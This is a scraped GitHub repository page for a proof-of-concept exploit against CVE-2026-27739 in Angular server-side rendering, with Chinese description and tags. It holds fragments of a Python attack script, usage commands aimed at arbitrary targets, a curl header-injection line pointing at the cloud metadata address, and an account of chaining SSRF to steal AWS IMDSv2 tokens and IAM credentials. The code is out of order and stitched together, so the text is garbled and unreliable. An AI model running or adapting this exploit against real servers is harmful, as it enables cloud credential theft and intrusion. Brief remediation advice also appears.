mr-redoo7/CVE-2026-27739-POC

GitHub: mr-redoo7/CVE-2026-27739-POC

该工具针对 Angular SSR 应用的 CVE-2026-27739 漏洞提供概念验证，用于检测原型污染导致的请求头注入、SSRF 及云元数据窃取风险。

Stars: 0 | Forks: 0

# -CVE-2026-27739-poc curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target} ### 2. Header Injection via Prototype Pollution (CVSS: 7.5) **描述**: Angular SSR 处理不安全的查询参数，影响原型链 **影响**: 请求头篡改，潜在的 SSRF 组合利用 ## 修复建议 1. 移除/禁用 X-Forwarded-* 头部处理或将已知代理加入白名单 2. 在进行易受 SSRF 攻击的操作之前实施严格的 URL 验证 3. 使用 `express-validator` 或类似工具进行头部清理 4. 禁用 AWS/GCP 元数据端点，或使用带有跳数限制的 IMDSv2 """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report) def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification") ``` args = parser.parse_args() exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify) print(f"[+] Targeting: {args.target}") print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}") # Execute exploit chain exploit.test_header_injection() exploit.exploit_ssrf_chain() exploit.extract_sensitive_data() exploit.generate_report() ``` if __name__ == "__main__": main() Usage bash # Basic SSRF test python3 angular_ssr_exploit.py https://target.com # With SSL bypass for self-signed certs python3 angular_ssr_exploit.py https://target.com --no-ssl-verify How It Works Header Injection Test: Sends prototype pollution payloads and unsafe forwarded headers that Angular SSR might process insecurely SSRF Chain: Tests access to AWS IMDS, GCP metadata, localhost services via X-Forwarded-For/X-Original-URL IMDSv2 Token Extraction: Chains SSRF to steal AWS metadata tokens then IAM credentials Automated Reporting: Generates CVSS-scored pentest report with PoCs Technical Details Root Cause: Angular Universal SSR apps often forward req.headers directly to internal APIs without sanitization: javascript // Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

标签：Angular SSR, AWS IMDS, CISA项目, CVE-2026-27739, EXP, GCP 元数据, Header 注入, IMDSv2, PoC, Python, SSRF, X-Forwarded-For, 元数据窃取, 原型链污染, 安全漏洞, 实时处理, 无后门, 暴力破解, 服务器端请求伪造, 网络安全, 逆向工具, 隐私保护